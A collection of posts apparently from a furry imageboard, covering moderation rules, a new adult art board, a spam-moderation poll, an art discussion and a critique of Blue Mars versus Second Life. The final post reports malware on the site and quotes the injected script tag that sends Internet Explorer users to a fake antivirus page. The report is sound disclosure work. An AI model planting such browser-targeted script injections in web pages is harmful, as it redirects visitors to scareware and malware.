If you have any problem with any thread/post, here's the place to put it. I will look at the thread/post, and if it is breaking a rule or any forum policy, i'll deal with it. If not, i'll probably just ignore you.

If i see any finger-pointing in any thread other than this, those posts will most likely be deleted.

To put it simply, post here if you have any problems on the board, and i'll try to get around to it.

HERM THREADS AND PICTURES ARE NO LONGER ALLOWED IN /F/.

Due to popular demand over the last year or so, I've been looking into getting a herm board made. Due to my recent promotion, i have now been able to make this possible. Please direct your attention to the board list, where you will notice a new Furry Herm Art board!

In other news, me and bart have also fixed the boards so that reloading a board (f5) will actually work now! No more waiting forever for seeing a change in a thread, or having to clear our your cache!

While other boards may be suffering from the same dilemma, it has come to my direct attention for some time now that threads are becoming far too inundated with spam.

Be it your typical reaction image with a funny comment, mass bumps, random irrelevant arguments--I believe it is becoming way too common. I don't think using the iron fist of moderating is the correct action, but us mods can't keep up with the thread cleaning, which is a shame because our energy would be better spent towards organizing the catalog.

So other than adding more mods, what would paws users prefer? Heavier moderation (deleting spam and banning the user for a certain time, specifically in threads with regularly updated content), or as it is now (irregular to no moderation)?

My own server, and later on random ones that don't have spray taggers.

In my server it was sort of an in-joke since it wasn't really tagged as a furry server, and whenever someone came in an complained about my sprays I'd just poke fun at'em. Purely without using admin commands, of course, that was one of my main principles, to not have dick admins.

First, I am NOT trolling, nor am I posting to start a huge fighting argument. All I want are opinions - after you've shared yours, discuss but *please* don't start screaming it. And no bitching about the artist.

Is this sexy? Err, barring the nipples and cameltoe, is the rest sexy? I generally don't go for 'large' furs, but I think she's hot. She looks strong, and the artist says she's head mechanic for a car racing team, meaning she likely HAS to be strong. And she seems too together-looking to appeal to the fur fat fetishists, who seem to like girls who can barely walk - no offense intended but it seems to be the norm for the fat fetish art.

I admit I touched up the pic slightly, the original is on his FA page. But I like it.

There's been talk lately about how various goings on is creating competition for Second Life. Well, I just checked out Blue Mars, and it completely sucks. There's virtually nothing I can say about it that's better than SL other than the fact that the graphics are a bit better. On top of that, the only places I visited (I suppose) are the pre-defined areas built by the creators, hence, those areas look professionally built (Like Linden areas do in Second Life). The graphics engine does seem a bit better. Objects do appear to cast shadows (real ones, not faked out prims such as you see in SL, however SL does have shadows in the works (for quite some time now)). Anyways, beyond a tad better graphics than SL, everything about it sucks.

1. Camera:
When you turn around, you face a static camera. The camera never moves unless you move it manually, which means that you can't simply turn and walk and have the camera automatically follow behind you as in SL.

2. Buggy/Laggy:

I walked into a structure and my avatar lost all textures, and went into a posing stand stance, not to mention, the camera stayed outside the room, and I had to fiddle around to get the camera inside the room. Overall movement was slow, clunky and a tad laggy.

3. Movement:
The 'recommended' way to walk was to click in front of your avatar (where a blue cone shows up), and the avatar walks to that point. A 3 tone do-do-doot sound plays each time your avatar reaches the cone, so you're constantly hearing the sound over and over just walking around. Walking with the arrows isnt much better because the camera stays completely static, so to use the arrow keys you have to walk, then switch to the mouse to move the camera left or right, then walk, etc... No apparent option for setting a follow cam option either.

4. No Place to go, no way to get there:
It places you in a welcome area with a handful of destinations to go to, and once you're there, you're on your own. No teleporting (other than back to the home location (Telehub anyone?, even LL dropped that lame concept ages ago). The only options you have are walking or running. No teleporting, no flying

An important statement to all.

There is a serious risk of malware on the front page of pawsru. Well, only to specific users. If you browse to the front page using IE, you will be redirected to a fake anti virus site, falsely claiming there is malware on your PC. Browsing to the site on Firefox or any other browser however, nothing happens as it should. A problem with IE right? Wrong.

Browse to the front page on IE using a different agent string for another browser, and you will see that the redirect does not happen. Likewise, change your Firefox user agent string to IE and load the front page, and you will be redirected to the fake anti virus site. So why is this happening?

It lies in the news.htm on the front page. There are two news.htm that are sent out, one to IE users, the other to every other browser. The two news.htm's are the same except for one small detail, the one that is sent to IE users includes a small script "<script src="http://globalpoweringgathering.com/tt.php?k=2"></script>"

That script redirects you to the fake anti virus site.

So is this some deliberate attempt to infect IE users with malware? Nonetheless, this deserves the attention of the site administrator.

Well, heres the thing. If you browse the front page using Firefox, Chrome, Opera, or whichever browser, while using an IE user agent string, the redirect will happen no matter what.

So the other browsers are not stopping this redirect, not as long as pawsru sees them as IE.

Let me just clarify once again to the people who don't bother to read. This is not a virus or malware I have, this affects EVERYONE. This is not a problem or vulnerability with IE. This is not a problem with Firefox or any browser for that matter. This problem is strictly the fault of Pawsru's administrator as he/she put it there, and its deliberately targeting IE users for who knows why.
